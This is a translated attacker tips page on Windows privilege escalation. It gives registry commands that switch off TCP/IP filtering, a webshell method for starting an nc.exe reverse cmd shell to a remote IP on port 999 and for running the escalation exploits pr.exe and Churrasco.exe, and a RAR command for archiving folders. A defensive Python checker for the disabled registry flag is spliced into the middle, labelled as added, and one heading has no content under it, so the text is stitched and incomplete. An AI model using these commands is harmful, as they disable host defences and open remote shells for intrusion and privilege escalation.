Privilege Escalation, ***, Experience and Tips: Complete Summary, Part 4

Relative paths of configuration files for various websites:

 
Removing TCP/IP filtering:

The TCP/IP filtering setting is stored in three places in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Export each of these registry keys with the following commands:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

Then, in each of the three files, change:

"EnableSecurityFilters"=dword:00000001

to:

"EnableSecurityFilters"=dword:00000000

Finally, import the three files back into the registry with the following commands:
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
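
From the defender's side, exported copies of these keys can be checked for the disabled setting. The following is an added example, not part of the original page: it parses .reg export text and lists the keys where EnableSecurityFilters is 0. The function names and the sample export are constructed for illustration, and the Parameters subkey in the sample is an assumption about where the value sits.

```python
import re

SECTION = re.compile(r'^\[(-?)(.+)\]$')
DWORD = re.compile(r'^"EnableSecurityFilters"=dword:([0-9a-f]{8})$', re.IGNORECASE)

def decode_reg(raw: bytes) -> str:
    """Decode a .reg export: version 5.00 files are UTF-16LE with a BOM,
    older REGEDIT4 files are single-byte ANSI."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    return raw.decode("cp1252", errors="replace")

def filter_state(reg_text: str) -> dict:
    """Map every key that carries EnableSecurityFilters to True (on) or False (off)."""
    state, key = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        m = SECTION.match(line)
        if m:
            # A "[-KEY]" header deletes the key, so values under it are ignored.
            key = None if m.group(1) else m.group(2)
            continue
        m = DWORD.match(line)
        if m and key:
            state[key] = int(m.group(1), 16) != 0
    return state

def disabled_keys(reg_text: str) -> list:
    """Keys whose TCP/IP filtering flag is switched off, sorted for stable reporting."""
    return sorted(k for k, on in filter_state(reg_text).items() if not on)

# Constructed sample export (not taken from a real host).
KEY_TEMPLATE = r"HKEY_LOCAL_MACHINE\SYSTEM\{}\Services\Tcpip\Parameters"
SAMPLE = b"\xff\xfe" + "\r\n".join([
    "Windows Registry Editor Version 5.00", "",
    "[" + KEY_TEMPLATE.format("ControlSet001") + "]",
    '"EnableSecurityFilters"=dword:00000000', "",
    "[" + KEY_TEMPLATE.format("ControlSet002") + "]",
    '"EnableSecurityFilters"=dword:00000001', "",
]).encode("utf-16-le")

if __name__ == "__main__":
    for key in disabled_keys(decode_reg(SAMPLE)):
        print("TCP/IP filtering disabled in:", key)
```

Comparing the result against a known-good baseline export shows whether the flag was changed after the host was configured.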
 
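Webshell privilege escalation tip:

Cmd path: c:\windows\temp\cmd.exe

Nc is in the same directory. For example, running a reverse cmd shell as a single command:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

usually does not succeed.

However, entering this directly as the cmd path: c:\windows\temp\nc.exe

and this as the command input: -vv ip 999 -e c:\windows\temp\cmd.exe

does succeed. That is not the main point, though.
When we run pr.exe or Churrasco.exe, we usually also need to follow the method above for it to succeed.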
 
Calling RAR from the command line to create an archive:

rar a -k -r -s -m3 c:\1.rar c:\folder
 

